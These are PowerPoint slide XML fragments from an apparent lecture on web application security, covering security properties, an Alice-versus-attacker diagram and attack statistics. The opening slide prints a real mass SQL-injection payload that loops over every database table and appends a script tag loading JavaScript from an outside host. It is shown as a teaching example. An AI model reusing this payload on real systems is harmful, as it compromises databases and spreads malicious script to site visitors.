              <a:t>/Chapter%206-Bloodborne%20Pathogens%20Human%20Tissue?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xDECLARE @T varchar(255)'@C varchar(4000) DECLARE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table_Cursor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> CURSOR FOR select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a.name'b.name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a'syscolumns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> b where a.id=b.id and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a.xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='u' and (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b.xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=99 or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b.xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=35 or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b.xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=231 or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b.xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=167) OPEN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table_Cursor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FETCH NEXT FROM  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table_Cursor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"&gt;&lt;/title&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://sdo.1000mg.cn/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>csrss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/w.js"&gt;&lt;/script&gt;&lt;!--'' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>??re '+@C+' not like ''%"&gt;&lt;/title&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://sdo.1000mg.cn/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>csrss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/w.js"&gt;&lt;/script&gt;&lt;!--''')FETCH NEXT FROM  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table_Cursor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> INTO @T'@C END CLOSE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table_Cursor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> DEALLOCATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Table_Cursor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" dirty="0"/>
              <a:t>http://www.dolcevie.com/js/converter.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5B6A2AB-DA72-BE5D-BF9C-6CF8924B6B33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A1FB9855-984D-4CE2-859A-6FEC9FCDF23B}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{525272EB-094F-7E44-C4AE-909897E69CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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99830561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noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>Do you know?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78851" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024127" y="1066800"/>
            <a:ext cx="10786871" cy="5486400"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>75% of attacks today happen at the Application Layer (Gartner).  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>Many “easy hacking recipes” published on web. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>Security holes in the web application layer can make a perfectly patched and firewalled server completely vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" i="1" dirty="0"/>
              <a:t>The cost and reputation savings of avoiding a security breach are “priceless”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="nb-NO" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="336699"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE8E8F24-1D05-E11D-3331-D300AD42B540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{98B40626-D1D6-4D8B-80C5-795C06D184F5}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5D22946-5F7F-2A70-E0BF-1E572366D605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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194005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nb-NO"/>
              <a:t>Security properties</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Confidentiality	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Information about system or its users cannot be learned by an attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>The system continues to operate properly, only reaching states that would occur if there were no attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Actions by an attacker do not prevent users from having access to use of the system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90AAFC6E-67C7-C0E8-1DFD-C4FA09E54D67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{997D24C2-5684-421A-B01B-572EFFFA16C3}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E8117A2-051D-B17A-95ED-D7AFDB79B626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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885794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029200" y="1100138"/>
            <a:ext cx="2209800" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="1104900"/>
            <a:ext cx="533400" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000" y="1104900"/>
            <a:ext cx="533400" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="12293" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8763000" y="1028700"/>
            <a:ext cx="1703388"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8" descr="Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="1028700"/>
            <a:ext cx="160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TextBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9118601" y="3409950"/>
            <a:ext cx="1116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nb-NO"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12296" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3409950"/>
            <a:ext cx="71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nb-NO"/>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12297" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="1485900"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12298" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3657600" y="2400300"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12299" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="1485900"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12300" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7924800" y="2400300"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12301" name="Title 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="304800"/>
            <a:ext cx="7772400" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>General picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12302" name="Content Placeholder 14" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="3962400"/>
            <a:ext cx="8686800" cy="2590800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>Security is about</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>Honest user (e.g., Alice, Bob, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>Dishonest Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>How the Attacker </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>Disrupts honest user’s use of the system  (Integrity, Availability)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>Learns information intended for Alice only (Confidentiality)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAE42AA1-8D7C-93D6-6DFE-C0DE68B73931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
